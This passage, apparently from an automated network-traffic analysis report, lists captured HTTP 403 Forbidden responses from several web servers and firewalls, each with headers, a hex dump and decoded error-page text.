                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Wed, 31 May 2023 12:52:09 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:52:09 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:10 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FMKyVV4p8MeiOUG940ldKUIxrNYB6nULQyoCXR1arBRdh6orr2npilBWSozeK5BwMDslQbJ3Ab%2FfQU2xwsHyItlW23N9tf1RJULJxwmKLVn6HpHfmblUoA%2FL5pIECqM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a3e19d16937-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:10 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sjxlzelXbiv8OL72%2BZhZY1GPU0VmjRIdkvwmLW9Fo5P5EsmILJrj4NVEOolxWm27grarM3QxPwEF%2FASSLoHjEBGZWwEKqoL8k%2BVvvpZTRqLC68T23Wxdms8yEKxvUwc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a3e4a0d6937-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 31 May 2023 12:52:11 GMTcontent-type: text/html; charset=iso-8859-1content-length: 199server: Apachex-iplb-request-id: 66818F2B:CA77_D5BA2110:0050_647742FB_9900:204C0x-iplb-instance: 28105Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Wed, 31 May 2023 12:52:12 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 31 May 2023 12:52:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:13 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:13 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 31 May 2023 12:56:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15012X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:16 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMcxRClD99vedTJ13BhZP3+5,qquldgcFrj2n046g4RNSVE8eNr0PeAeqFyO7fo2b794=X-Wix-Request-Id: 1685537536.7856430603215483X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome 